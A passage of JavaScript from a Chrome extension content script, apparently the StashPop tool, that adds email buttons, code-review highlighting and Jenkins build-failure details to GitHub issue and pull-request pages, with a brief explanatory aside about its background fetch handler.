0) { for (var c = 0; c < positiveIndicators.length; c++) { if (bodyHtml.indexOf(positiveIndicators[c]) >= 0) { positiveReviews.push(comment); break; } } } if (negativeIndicatorsString.length > 0) { for (var c = 0; c < negativeIndicators.length; c++) { if (bodyHtml.indexOf(negativeIndicators[c]) >= 0) { negativeReviews.push(comment); break; } } } if (testedIndicatorsString.length > 0) { for (var c = 0; c < testedIndicators.length; c++) { if (bodyHtml.indexOf(testedIndicators[c]) >= 0) { testReviews.push(comment); break; } } } } } if (positiveReviews.length > 0 || negativeReviews.length > 0 || testReviews.length > 0) { var reviewsContainer = document.createElement("div"); reviewsContainer.setAttribute("class", stashPopClassName); if (positiveReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Approvals", positiveReviews, "#77ff77", "#edffed", "#00cc00"); } if (negativeReviews.length > 0) { 
addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Rejections", negativeReviews, "#ff7777", "#ffedf6", "#cc0000"); } if (testReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Tested by", testReviews, "#77ccff", "#dff6ff", "#0000cc"); } var discussion = document.getElementsByClassName("js-discussion")[0]; discussion.insertBefore(reviewsContainer, discussion.firstChild); } } function getBestCodeReviewOptions(codeReviewOptions) { var codeReviewOptionsEntries = codeReviewOptions.trim().match((/[^\r\n]+/g)); log("Calculating best matching code review options"); // * = 1, org = 2, repo = 3 var bestMatchLevel = 0; for (var i = 0; i < codeReviewOptionsEntries.length; i++) { log(" Considering " + codeReviewOptionsEntries[i].trim()); var rerunEntryParts = codeReviewOptionsEntries[i].trim().split(";"); var scope = rerunEntryParts[0].trim(); var matchLevel = 0; var entryMatches = false; if (scope == "*") { matchLevel = 1; entryMatches = true; } else if (scope.indexOf("/") == -1) { matchLevel = 2; entryMatches = scope == currentPageOrg; } else { matchLevel = 3; var org = scope.split("/")[0]; var repo = scope.split("/")[1]; entryMatches = org == currentPageOrg && repo == currentPageRepo; } log(" Matches / Level: " + entryMatches + "/" + matchLevel); if (entryMatches && matchLevel > bestMatchLevel) { var bestMatch = codeReviewOptionsEntries[i].trim(); log(" Setting new best match to: " + bestMatch); } } log("Best-match code review options: " + bestMatch); return bestMatch; } function addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, title, reviews, contributorBackgroundColor, externalBackgroundColor, contributorAggregationBackground) { var titleDiv = document.createElement("div"); var titleText = document.createElement("b"); titleText.textContent = title + ": "; titleDiv.appendChild(titleText); titleDiv.style.cssFloat = "left"; titleDiv.style.display = "block"; reviewsContainer.appendChild(titleDiv); var reviewListDiv = document.createElement("div"); reviewListDiv.style.cssFloat = "left"; reviewListDiv.style.display = "block"; var commentsFromContributors = new Array(); var commentsFromNonContributors = new Array(); for (var i = 0; i < reviews.length; i++) { var review = reviews[i]; var header = review.getElementsByClassName("timeline-comment-header-text")[0]; var username = header.getElementsByTagName("strong")[0].innerText; var label = review.getElementsByClassName("timeline-comment-label")[0]; var labelPart = ""; if (typeof label !== "undefined") { var reviewerKind = label.innerText; labelPart = "<span class='timeline-comment-label' style='margin:0px;'>" + reviewerKind + "</span>"; } var headerForBackground = review.getElementsByClassName("timeline-comment-header")[0]; headerForBackground.style.backgroundColor = (labelPart == "" ? externalBackgroundColor : contributorBackgroundColor); var time = review.getElementsByTagName("time")[0].innerText; var imgTag = review.children[0].children[0].cloneNode(); imgTag.className = "avatar"; imgTag.height = 35; imgTag.width = 35; imgTag.style.backgroundColor = (labelPart == "" ? 
"#C8C8C8" : contributorAggregationBackground); imgTag.style.padding = "3px"; var tooltip = review.children[1].getElementsByClassName("js-comment-body")[0].innerHTML; var tooltipHeader = labelPart + "<p><b>" + username + "</b> commented " + time + "</p>"; imgTag.setAttribute("stashpop-title", tooltipHeader + tooltip); imgTag.role = "button"; imgTag.style.cursor = "pointer"; imgTag.style.margin = "0px 0px 3px 3px"; var clickLocation = "#" + header.getElementsByClassName("timestamp")[0].href.split("#")[1]; (function (newLocation) { imgTag.onclick = function () { // todo: navigation doesn't work if location.hash == newLocation location.hash = newLocation; }; })(clickLocation); if (labelPart == "") { commentsFromNonContributors.push(imgTag); } else { commentsFromContributors.push(imgTag); } } var allComments = commentsFromContributors.concat(commentsFromNonContributors); for (var i = 0; i < allComments.length; i++) { reviewListDiv.appendChild(allComments[i]); if (i % 10 == 9) { reviewListDiv.appendChild(document.createElement("br")); } } reviewsContainer.appendChild(reviewListDiv); var clearDiv = document.createElement("div"); clearDiv.style.clear = "both"; reviewsContainer.appendChild(clearDiv); } function sendmultimail(issuesList, isPull) { var baseUrl = document.getElementsByClassName("entry-title")[0].getElementsByTagName('strong')[0].getElementsByTagName('a')[0].href; baseUrl = baseUrl + (isPull ? "/pull/" : "/issues/"); var owner = document.getElementsByClassName("entry-title")[0].getElementsByClassName("author")[0].getElementsByTagName("span")[0].innerHTML; var repo = document.getElementsByClassName("entry-title")[0].getElementsByTagName("strong")[0].getElementsByTagName("a")[0].innerHTML; var body = ""; var shortBody = ""; var count = 0; var singleIssueNumber = ""; var singleIssueTitle = ""; for (var i = 0; i < issuesList.children.length; i++) { if (issuesList.children[i].classList.contains("selected")) { count++; var issue = issuesList.children[i]; var title = issue.getElementsByClassName("issue-title")[0]; var urlParts = title.getElementsByClassName("issue-title-link")[0].href.split("/"); var issueNumber = urlParts[urlParts.length - 1].trim(); var issueTitle = title.getElementsByClassName("issue-title-link")[0].innerHTML.trim(); singleIssueNumber = issueNumber; singleIssueTitle = issueTitle; // TODO: Fetch the target branch of each PR. body = body + issueTitle + " " + baseUrl + issueNumber + "\r\n"; shortBody = shortBody + "#" + issueNumber + ": " + issueTitle + "\r\n"; } } if (count == 1) { sendmail(singleIssueNumber, singleIssueTitle, isPull); return; } var subject = owner + "/" + repo + ": " + count + " Selected " + (isPull ? "PRs" : "Issues"); body = body + "\r\n\r\n"; // TODO: Assigned to, etc. shortBody = shortBody + "\r\n\r\n"; // TODO: Assigned to, etc. var isPublic = (typeof document.getElementsByClassName("entry-title private")[0] === "undefined"); if (!isPublic) { body = body + "Notice: This message contains information about a private repository." shortBody = shortBody + "Notice: This message contains information about a private repository." 
} var decodedSubject = $('<div/>').html(subject).text(); var decodedBody = $('<div/>').html(body).text(); var decodedShortBody = $('<div/>').html(shortBody).text(); var finalFullMailToUrl = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedBody); var finalShortMailToUrl = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedShortBody); if (finalFullMailToUrl.length <= 2083) { window.location.href = finalFullMailToUrl; } else if (finalShortMailToUrl.length <= 2083) { window.location.href = finalShortMailToUrl; window.alert("issue links omitted to fit within the maximum mailto url length"); } else { window.alert("mailto maximum url length exceeded, choose fewer items"); } } function sendmail(issueNumber, issueTitle, isPull) { issueTitle = issueTitle.trim(); issueNumber = issueNumber.trim(); var baseUrl = document.getElementsByClassName("entry-title")[0].getElementsByTagName('strong')[0].getElementsByTagName('a')[0].href; var kind = isPull ? "PR" : "Issue"; baseUrl = baseUrl + (isPull ? "/pull/" : "/issues/"); var owner = document.getElementsByClassName("entry-title")[0].getElementsByClassName("author")[0].getElementsByTagName("span")[0].innerHTML; var repo = document.getElementsByClassName("entry-title")[0].getElementsByTagName("strong")[0].getElementsByTagName("a")[0].innerHTML; var targetBranchDisplay = ""; if (isPull) { if (isListPage) { // The PR list page contains no information about target branch, so we have to go look it up. var url = "https://github.com/" + currentPageOrg + "/" + currentPageRepo + "/pull/" + issueNumber; chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: url, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var fullTargetBranchSpec = doc.getElementsByClassName("current-branch")[0].innerText; log("PR target branch (from individual PR page): " + fullTargetBranchSpec); finishIt(fullTargetBranchSpec); }); } else { var targetFullBranchSpecParts = $(".current-branch").first().text().split(":"); var targetBranch = targetFullBranchSpecParts.length == 1 ? targetFullBranchSpecParts[0] : targetFullBranchSpecParts[1]; log("PR target branch: " + targetBranch); if (targetBranch != "master" && targetBranch != "") { targetBranchDisplay = "/" + targetBranch; log("PR target branch display: " + targetBranchDisplay); } } } var subject = owner + "/" + repo + targetBranchDisplay + " " + kind + " #" + issueNumber + ": " + issueTitle; var body = baseUrl + issueNumber + "\r\n\r\n"; // TODO: Assigned to, etc. var isPublic = (typeof document.getElementsByClassName("entry-title private")[0] === "undefined"); if (!isPublic) { body = body + "Notice: This message contains information about a private repository." } var decodedSubject = $('<div/>').html(subject).text(); var decodedBody = $('<div/>').html(body).text(); window.location.href = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedBody); }
content.js
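Both revisions of content.js (the updated file above and the previous revision below) fetch cross-origin pages such as individual PR pages and Jenkins build results by messaging the extension's background page with action: 'xhttp' and then parsing the returned responseText. The background-side handler is not part of this file, so the following is only an illustrative sketch of what such a listener could look like; the listener shape, the XMLHttpRequest use, and any host permissions are assumptions rather than the extension's actual code.

// Hypothetical background-page listener for the { action: 'xhttp' } messages
// sent throughout content.js. Sketch only; not the real StashPop background script.
chrome.runtime.onMessage.addListener(function (request, sender, sendResponse) {
    if (request.action !== 'xhttp') { return; }
    var xhr = new XMLHttpRequest();
    xhr.open(request.method || 'GET', request.url, true);
    xhr.onload = function () { sendResponse(xhr.responseText); };
    xhr.onerror = function () { sendResponse(''); };
    xhr.send(request.data || null);
    return true; // keep the message channel open for the asynchronous sendResponse
});

The callback in content.js receives the raw responseText and turns it into a scrapeable document with new DOMParser().parseFromString(responseText, "text/html").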
// Constants var stashPopClassName = "stashPop"; var jenkinsReloadableInfoClassName = "jenkinsReloadableInfo"; // This list must match the list specified in reload() var option_emailIssuesList = "emailIssuesList"; var option_emailIssue = "emailIssue"; var option_emailPullRequestList = "emailPullRequestList"; var option_emailPullRequest = "emailPullRequest"; var option_jenkinsOpenDetailsLinksInNewTab = "jenkinsOpenDetailsLinksInNewTab"; var option_jenkinsShowRunTime = "jenkinsShowRunTime"; var option_jenkinsShowFailureIndications = "jenkinsShowFailureIndications"; var option_jenkinsShowTestFailures = "jenkinsShowTestFailures"; var option_jenkinsShowBugFilingButton = "jenkinsShowBugFilingButton"; var option_jenkinsShowRetestButton = "jenkinsShowRetestButton"; var option_jenkinsOfferInlineFailuresOnPRList = "jenkinsOfferInlineFailuresOnPRList"; var option_issueCreationRouting = "issueCreationRouting"; var option_nonDefaultTestInfo = "nonDefaultTestInfo"; var option_defaultIssueLabels = "defaultIssueLabels"; var option_testRerunText = "testRerunText"; var option_showCodeReviewInfo = "showCodeReviewInfo"; var option_codeReviewOptions = "codeReviewOptions"; document.addEventListener("DOMContentLoaded", function () { "use strict"; log("DOMContentLoaded"); try { initialSetup(); reload(true); } catch (err) { logfailure(err); } }); function initialSetup() { log("Performing initial setup"); configureTooltips(); var s = document.createElement('script'); s.src = chrome.extension.getURL('scripts/injectedcode.js'); s.onload = function () { this.parentNode.removeChild(this); }; (document.head || document.documentElement).appendChild(s); document.addEventListener('_pjax:end', function () { log("Detected page data changed."); reload(false); }, false); } function configureTooltips() { log("Configuring tooltips"); $(document).tooltip({ items: "[stashpop-title]", track: false, close: function (evt, ui) { $(document).data("ui-tooltip").liveRegion.children().remove(); }, position: { my: "left+5 top+5", at: "left bottom" }, tooltipClass: "ui-tooltip", show: "slideDown", hide: false, content: function () { var element = $(this); if (element.is("[stashpop-title]")) { var text = element.attr("stashpop-title"); return text; // "<b>What up?</b> Yo?"; } } }); } function reload(firstRun) { resetGlobals(); log("Remove all StashPop elements and reload data"); $('.' 
+ stashPopClassName).remove(); chrome.runtime.sendMessage({ method: "getSettings", keys: [ option_emailIssuesList, option_emailIssue, option_emailPullRequestList, option_emailPullRequest, option_jenkinsOpenDetailsLinksInNewTab, option_jenkinsShowRunTime, option_jenkinsShowFailureIndications, option_jenkinsShowTestFailures, option_jenkinsShowBugFilingButton, option_jenkinsShowRetestButton, option_jenkinsOfferInlineFailuresOnPRList, option_issueCreationRouting, option_nonDefaultTestInfo, option_defaultIssueLabels, option_testRerunText, option_showCodeReviewInfo, option_codeReviewOptions ] }, function (currentSettings) { if (isIndividualItemPage) { var title = document.getElementsByClassName("js-issue-title")[0].innerHTML; var number = document.getElementsByClassName("gh-header-number")[0].innerHTML.substring(1); // https://github.com/dotnet/roslyn/pull/5786 var isPull = postDomainUrlParts[2] == "pull"; if (isPull && currentSettings[option_showCodeReviewInfo]) { var bestCodeReviewOptions = getBestCodeReviewOptions(currentSettings[option_codeReviewOptions]); observeCommentFieldChanges(bestCodeReviewOptions); addCodeReviewSummaryAndButtons(bestCodeReviewOptions); } addButtonsToIndividualItemPage(title, number, isPull, currentSettings); makeBuildStatusWindowsBig(); if (currentSettings[option_jenkinsOpenDetailsLinksInNewTab]) { openJenkinsDetailsInNewTab(currentSettings); } } if (isListPage) { // https://github.com/dotnet/roslyn/pulls/dpoeschl // https://github.com/pulls var isPull = postDomainUrlParts[2] == "pulls" || (currentPageOrg == null && postDomainUrlParts[0] == "pulls"); addButtonsToListPage(isPull, currentSettings); } reloadJenkins(firstRun, currentSettings); } ); } function observeCommentFieldChanges(codeReviewOptions) { var splitCodeOptions = codeReviewOptions.split(";"); var positiveIndicatorsString = splitCodeOptions[1].trim(); var negativeIndicatorsString = splitCodeOptions[2].trim(); var testedIndicatorsString = splitCodeOptions[3].trim(); if (positiveIndicatorsString.length == 0 && negativeIndicatorsString.length == 0 && testedIndicatorsString.length == 0) { log("Empty code review options. Bail.") return; } var positiveIndicators = positiveIndicatorsString.split(","); var negativeIndicators = negativeIndicatorsString.split(","); var testedIndicators = testedIndicatorsString.split(","); var target = document.querySelector('#new_comment_field'); var observer = new MutationObserver(function (mutations) { mutations.forEach(function (mutation) { var text = target.value; for (var c = 0; c < positiveIndicators.length; c++) { if (text.indexOf(positiveIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#77ff77"; }); return; } } for (var c = 0; c < negativeIndicators.length; c++) { if (text.indexOf(negativeIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#ff7777"; }); return; } } for (var c = 0; c < testedIndicators.length; c++) { if (text.indexOf(testedIndicators[c]) >= 0) { $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#77ccff"; }); return; } } // Default background color $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#f7f7f7"; }); }); }); var config = { attributes: true, childList: true, characterData: true }; observer.observe(target, config); } function reloadJenkins(firstRun, currentSettings) { if (!firstRun) { log("Deleting inlined Jenkins data"); $('.' 
+ jenkinsReloadableInfoClassName).remove(); } addTestFailureButtonsAndDescriptions(currentSettings); if (currentSettings[option_jenkinsShowRunTime]) { addJenkinsTestRunTimes(); } if (currentSettings[option_jenkinsShowRunTime] || currentSettings[option_jenkinsShowFailureIndications] || currentSettings[option_jenkinsShowBugFilingButton] || currentSettings[option_jenkinsShowRetestButton]) { addJenkinsRefreshButton(currentSettings); } } // Globals var currentPageFullUrl; var postDomainUrlParts; var currentPageOrg; var currentPageRepo; var isIndividualItemPage; var individualItemPageTitleElement; var isListPage; var itemListElement; function resetGlobals() { log("Resetting globals"); log("Clearing old globals"); currentPageFullUrl = null; postDomainUrlParts = null; currentPageOrg = null; currentPageRepo = null; isIndividualItemPage = null; individualItemPageTitleElement = null; isListPage = null; itemListElement = null; log("Setting new globals"); currentPageFullUrl = window.location.href; log("currentPageFullUrl: " + currentPageFullUrl); var urlParts = normalizeAndRemoveUrlParameters(currentPageFullUrl).split("/"); var indexOfGitHubDotCom = -1; for (var i = 0; i < urlParts.length; i++) { if (urlParts[i].indexOf("github.com") > -1) { indexOfGitHubDotCom = i; break; } } if (indexOfGitHubDotCom > -1) { postDomainUrlParts = urlParts.slice(indexOfGitHubDotCom + 1, urlParts.length); log("postDomainUrlParts: " + postDomainUrlParts.toString()); var org = urlParts[indexOfGitHubDotCom + 1]; var repo = urlParts[indexOfGitHubDotCom + 2]; log("ASDF" + repo); if (typeof org !== "undefined") { if (org == "pulls") { // Personal pulls page: github.com/pulls... // Handled below, but don't treat "pulls" as the organization } else { // Organization sub-page: github.com/dotnet... currentPageOrg = org; } } log("currentPageOrg: " + currentPageOrg); if (typeof repo !== "undefined") { // Repository sub-page: github.com/dotnet/roslyn... currentPageRepo = repo; } log("currentPageRepo: " + currentPageRepo); individualItemPageTitleElement = document.getElementsByClassName("js-issue-title")[0]; isIndividualItemPage = typeof individualItemPageTitleElement !== 'undefined'; log("isIndividualItemPage: " + isIndividualItemPage); itemListElement = document.getElementsByClassName("table-list-issues")[0]; isListPage = typeof itemListElement !== 'undefined'; log("isListPage: " + isListPage); } } function logfailure(err) { log("ERROR - " + err); log("ERROR STACK - " + err.stack); } function log(message) { console.log("StashPop: " + message); } function addButtonsToIndividualItemPage(title, number, isPull, currentSettings) { if ((isPull && currentSettings[option_emailPullRequest]) || (!isPull && currentSettings[option_emailIssue])) { var buttonsContainer = document.createElement("div"); buttonsContainer.setAttribute("class", stashPopClassName); var emailButton = createButtonWithCallBack( isPull ? 
"Email PR" : "Email Issue", function () { log("Email Item clicked"); sendmail(number, title, isPull); }); buttonsContainer.appendChild(emailButton); if (!isPull) { var workItemButton = createButtonWithCallBack( "Copy as WorkItem Attribute", function () { log("Copy as WorkItem Attribute clicked"); copyTextToClipboard('<WorkItem(' + number + ', "' + window.location.href + '")>'); }); workItemButton.style.margin = "0px 0px 0px 4px"; buttonsContainer.appendChild(workItemButton); } individualItemPageTitleElement.parentNode.appendChild(buttonsContainer); } } function addButtonsToListPage(isPull, currentSettings) { if ((isPull && currentSettings[option_emailPullRequestList]) || (!isPull && currentSettings[option_emailIssuesList])) { var numberOfCheckedItemsElement = document.getElementsByClassName("js-check-all-count")[0]; if (typeof numberOfCheckedItemsElement !== "undefined") { var buttonAll = createButtonWithCallBack( "Email Selected " + (isPull ? "PRs" : "Issues"), function () { log("Email Selected Items clicked"); sendmultimail(itemListElement, isPull); }); buttonAll.className = "btn btn-sm"; numberOfCheckedItemsElement.parentNode.insertBefore(buttonAll, numberOfCheckedItemsElement.parentNode.firstChild); } for (var i = 0; i < itemListElement.children.length; i++) { var itemElement = itemListElement.children[i]; var titleElement = itemElement.getElementsByClassName("issue-title")[0]; var urlParts = titleElement.getElementsByClassName("issue-title-link")[0].href.split("/"); var issueNumber = urlParts[urlParts.length - 1]; var issueTitle = titleElement.getElementsByClassName("issue-title-link")[0].innerHTML; (function () { var _issueNumber = issueNumber; var _issueTitle = issueTitle; var emailButton = createButtonWithCallBack( isPull ? "Email PR" : "Email Issue", function () { log("Email Item clicked"); sendmail(_issueNumber, _issueTitle, isPull); }); emailButton.className = "btn btn-sm " + stashPopClassName; titleElement.insertBefore(emailButton, titleElement.firstChild); })(); } } if (isPull && currentSettings[option_jenkinsOfferInlineFailuresOnPRList]) { log("Handling failures in PR list"); var failureTitles = new Array(); var failureClassNames = new Array(); var failureIndices = new Array(); for (var i = 0; i < itemListElement.children.length; i++) { var itemElement = itemListElement.children[i]; if (typeof itemElement.getElementsByClassName("octicon-x")[0] !== "undefined") { // PR with failures log("Found a failure"); var titleElement = itemElement.getElementsByClassName("issue-title")[0]; var pullRequestElement = itemElement.getElementsByClassName("issue-title")[0]; // On github.com/pulls there are two "issue-title-link" elements. The first is for the repo, the second for the issue. // Get the issue number, then add the repo qualifier if necessary. 
var pullRequestUrlParts = pullRequestElement.getElementsByClassName("issue-title-link js-navigation-open")[0].href.split("/"); log("PR Request Parts: " + pullRequestUrlParts.toString()); var pullRequestNumber = pullRequestUrlParts[pullRequestUrlParts.length - 1]; log("In PR #" + pullRequestNumber); var pullRequestRepo = ""; if (currentPageOrg == null) { var prOrg = pullRequestUrlParts[pullRequestUrlParts.length - 4]; var prRepo = pullRequestUrlParts[pullRequestUrlParts.length - 3]; pullRequestRepo = prOrg + "_ClassNameFriendlySeparator_" + prRepo; log("In Repo: " + pullRequestRepo); } var pullRequestIdentifier = pullRequestRepo + pullRequestNumber; log("Failure identifier: " + pullRequestIdentifier); var showJenkinsFailureLink = document.createElement("a"); showJenkinsFailureLink.href = "#"; var className = "loadjenkinsfailure" + pullRequestIdentifier; showJenkinsFailureLink.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " " + className; showJenkinsFailureLink.text = "Show Jenkins failure"; showJenkinsFailureLink.style.color = 'red'; log("titleElement:" + titleElement); log("showJenkinsFailureLink:" + showJenkinsFailureLink); titleElement.appendChild(showJenkinsFailureLink); failureTitles.push(titleElement); failureClassNames.push(className); failureIndices.push(i); (function () { var _titleElement = titleElement; var _className = className; var _i = i; log("Hooking up click event for class " + _className); $('.' + _className).click(function (e) { e.preventDefault(); log("Click - Load Jenkins Failure for #" + _className.substring("loadjenkinsfailure".length)); inlineFailureInfoToPRList(_titleElement, _className, _i, currentSettings); }); })(); } } if (failureTitles.length >= 1) { var headerStates = document.getElementsByClassName("table-list-header-toggle states")[0]; var loadAllFailuresLink = document.createElement("a"); loadAllFailuresLink.href = "#"; loadAllFailuresLink.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " loadalljenkinsfailures"; loadAllFailuresLink.text = "Show all Jenkins failures"; loadAllFailuresLink.style.color = 'red'; headerStates.appendChild(loadAllFailuresLink); $('.loadalljenkinsfailures').click(function (e) { log("Click - Load All Jenkins Failures") e.preventDefault(); for (var i = 0; i < failureTitles.length; i++) { inlineFailureInfoToPRList(failureTitles[i], failureClassNames[i], failureIndices[i], currentSettings); } }); } } } function createCommentSettingLink(title, comment, color) { return createLinkWithCallBack( title, function () { var commentText = comment + "\n"; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); return false; }, color); } function createLinkWithCallBack(title, callback, color) { color = color || "#4078c0"; var a = document.createElement("a"); a.text = title; a.role = "button"; a.href = ""; a.style.marginRight = "5px"; a.style.color = color; a.onclick = callback; return a; } function createRequestJenkinsAccessLinkWithCallbackIfAllowed(url, callback) { return createLinkWithCallBack( "Grant StashPop access", function () { log("Allow/request access button clicked for " + url + ". 
Sending request..."); executeCallbackIfUrlAccessGranted(url, callback); return false; }); } function executeCallbackIfUrlAccessGranted(url, callback) { log("Requesting access for " + url + "..."); chrome.runtime.sendMessage({ method: "requestOriginAccess", keys: [url] }, function (response) { if (response) { log(" Access granted. Executing callback."); callback(); } else { log(" Access denied."); } }); } function createButtonWithCallBack(title, callback) { var button = document.createElement("input"); button.setAttribute("type", "button"); button.setAttribute("value", title); button.onclick = callback; return button; } // Copy provided text to the clipboard. function copyTextToClipboard(text) { var copyFrom = $('<textarea/>'); copyFrom.text(text); $('body').append(copyFrom); copyFrom.select(); document.execCommand('copy'); copyFrom.remove(); } // TODO: Only scrape once between this and addTestFailureButtonsAndDescriptions function addJenkinsTestRunTimes() { var testRuns = document.getElementsByClassName("build-status-item"); for (var i = 0; i < testRuns.length; i++) { var run = testRuns[i]; var detailsLink = run.getElementsByClassName("build-status-details")[0]; if (typeof detailsLink === 'undefined') { continue; } var textToUpdate = run.getElementsByClassName("text-muted")[0]; var loading = document.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var specificClassName = stashPopClassName + "_TestRunTime_" + i; loading.className = stashPopClassName + " " + specificClassName; textToUpdate.appendChild(loading); (function (_run, _url, _specificClassName) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _url, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var header = doc.getElementsByClassName("build-caption page-headline")[0]; if (typeof header === "undefined") { $('.' + _specificClassName).remove(); return; } var timestamp = header.innerText.split("(")[1].split(")")[0]; var timestampMoment = moment(timestamp); var dayCount = moment().diff(timestampMoment, 'days', true); var backgroundColor = "#000000"; if (dayCount <= 2) { backgroundColor = "#AAFFAA"; } // green else if (dayCount <= 5) { backgroundColor = "#FFC85A"; } // yellow else { backgroundColor = "#FFAAAA"; } // red $('.' 
+ _specificClassName).remove(); var textToUpdate = _run.getElementsByClassName("text-muted")[0]; var span = document.createElement("span"); span.innerHTML = "(" + timestampMoment.fromNow() + ")"; span.style.backgroundColor = backgroundColor; span.setAttribute("title", timestamp + "\n\nGreen: < 2 days\nYellow: 2 to 5 days\nRed: > 5 days"); span.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; textToUpdate.appendChild(span); }); })(run, detailsLink.href, specificClassName); } } function addTestFailureButtonsAndDescriptions(currentSettings) { if (currentSettings[option_jenkinsShowBugFilingButton] || currentSettings[option_jenkinsShowRetestButton] || currentSettings[option_jenkinsShowFailureIndications]) { processTestFailures( document, null, 0, currentSettings["jenkinsShowBugFilingButton"], currentSettings["jenkinsShowFailureIndications"], currentSettings["jenkinsShowTestFailures"], currentSettings["jenkinsShowRetestButton"], function (x, y, z, w) { }, currentSettings); } } function processTestFailures(doc, prLoadingDiv, rowNumber, jenkinsShowBugFilingButton, jenkinsShowFailureIndications, jenkinsShowTestFailures, jenkinsShowRetestButton, callbackWhenTestProcessed, currentSettings) { var testFailures = doc.getElementsByClassName("octicon-x build-status-icon"); if (typeof prLoadingDiv !== "undefined" && prLoadingDiv !== null) { // Delete the existing loading icon while (prLoadingDiv.firstChild) { prLoadingDiv.removeChild(prLoadingDiv.firstChild); } // Drop in a bunch of new loading icons for (var i = 0; i < testFailures.length; i++) { var isDropdown = false; var ancestor = testFailures[i]; while ((ancestor = ancestor.parentElement) != null) { if (ancestor.classList.contains("dropdown-menu")) { isDropdown = true; break; } } if (isDropdown) { continue; } var div = document.createElement("div"); var specificClassName = stashPopClassName + "_ActualTestFailureHolder_" + rowNumber + "_" + i; div.className = stashPopClassName + " " + specificClassName; div.style.color = "#000000"; var loading = doc.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var testFailure = testFailures[i]; var queueName = testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var t = document.createTextNode("Processing failed queue '" + queueName + "'..."); div.appendChild(loading); div.appendChild(t); prLoadingDiv.appendChild(div); } } if (!isListPage) { var nonDefaultTestInfo = currentSettings[option_nonDefaultTestInfo]; var nonDefaultTests = nonDefaultTestInfo.trim().match(/[^\r\n]+/g); var relevantNonDefaultTests = new Array(); log("Calculating relevant non-default test suites...") for (var i = 0; i < nonDefaultTests.length; i++) { log(" Considering: " + nonDefaultTests[i]) var specParts = nonDefaultTests[i].trim().split(":"); if (specParts.length == 2 || specParts.length == 3) { var scope = specParts[0].trim(); var testToRun = specParts[1].trim(); var runIfNotAlreadyRun = specParts.length == 3 ? specParts[2].trim() : testToRun; var scopeParts = scope.trim().split("/"); if (scopeParts.length == 1 || scopeParts.length == 2) { var orgToMatch = scopeParts[0].trim(); if (orgToMatch == currentPageOrg) { var repoToMatch = scopeParts.length == 2 ? 
scopeParts[1].trim() : ""; if (scopeParts.length == 1 || repoToMatch == currentPageRepo) { log(" It matches, adding mapping from " + runIfNotAlreadyRun + " to " + testToRun); relevantNonDefaultTests[runIfNotAlreadyRun] = testToRun; } } } } } var nonDefaultTestCount = 0; for (var key in relevantNonDefaultTests) { nonDefaultTestCount++; } log("relevantNonDefaultTests length: " + nonDefaultTestCount); log("Removing already-run tests...") var buildStatusList = $(".build-statuses-list:visible")[0]; if (typeof buildStatusList !== "undefined") { for (var i = 0; i < buildStatusList.children.length; i++) { var individualStatus = buildStatusList.children[i]; var queueName = individualStatus.getElementsByTagName("strong")[0].innerText.trim(); log(" Trying to delete: " + queueName); delete relevantNonDefaultTests[queueName]; } nonDefaultTestCount = 0; for (var key in relevantNonDefaultTests) { nonDefaultTestCount++; } log("Updated relevantNonDefaultTests length: " + nonDefaultTestCount); if (nonDefaultTestCount > 0) { var additionalJobsDiv = doc.createElement("div"); additionalJobsDiv.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; var t = document.createTextNode("Run non-default tests: "); additionalJobsDiv.appendChild(t); for (var key in relevantNonDefaultTests) { var value = relevantNonDefaultTests[key]; (function () { var jobName = value; var jobButton = createButtonWithCallBack( jobName, function () { var commentText = "retest " + jobName + " please\n"; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); }); jobButton.className = "btn btn-sm"; additionalJobsDiv.appendChild(jobButton); })(); } buildStatusList.previousSibling.previousSibling.appendChild(additionalJobsDiv); } } } for (var i = 0; i < testFailures.length; i++) { var isDropdown = false; var ancestor = testFailures[i]; while ((ancestor = ancestor.parentElement) != null) { if (ancestor.classList.contains("dropdown-menu")) { isDropdown = true; break; } } if (isDropdown) { continue; } var testFailure = testFailures[i]; var testFailUrl = testFailure.parentNode.getElementsByClassName("build-status-details")[0].href; var queueName = testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var loading = doc.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var specificClassNameForJenkinsFailureRedAreaLoader = stashPopClassName + "_TestFailures_" + i; loading.className = stashPopClassName + " " + specificClassNameForJenkinsFailureRedAreaLoader; testFailure.parentNode.insertBefore(loading, testFailure.parentNode.firstChild); var specificClassNameForPRListFailure = stashPopClassName + "_ActualTestFailureHolder_" + rowNumber + "_" + i; (function (_testFailure, _testFailUrl, _specificClassNameForPRListFailure, 